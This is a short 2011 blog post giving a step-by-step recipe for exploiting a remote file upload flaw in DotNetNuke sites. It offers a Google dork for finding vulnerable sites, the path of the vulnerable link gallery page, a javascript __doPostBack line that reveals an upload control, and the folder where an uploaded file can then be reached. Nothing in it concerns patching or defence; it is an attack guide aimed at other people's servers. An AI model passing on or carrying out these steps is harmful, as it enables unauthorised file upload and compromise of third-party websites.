Cpanel Hosting

Wednesday 2 November 2011

DotNetNuke Remote File upload Vulnerability :-)


DotNetNuke - DNN Remote File Upload ;)

Dork : inurl:/tabid/36/language/en-US/Default.aspx

Copy this dork in google.
You will get website like
http ://site.com/tabid/36/language/en-US/Default.aspx
 After that  just replace the line with
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
For eg:  http ://site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
 You will see this type of link. After this just click on File option.


After getting this types of  link .Just copy this in your URL.
javascript:__doPostBack('ctlURL$cmdUpload','')
When you copy this Script in URL you will get browse option.
 Just upload your file here.
You  can access your file from http://site.com/portals/0/your filename
















No comments: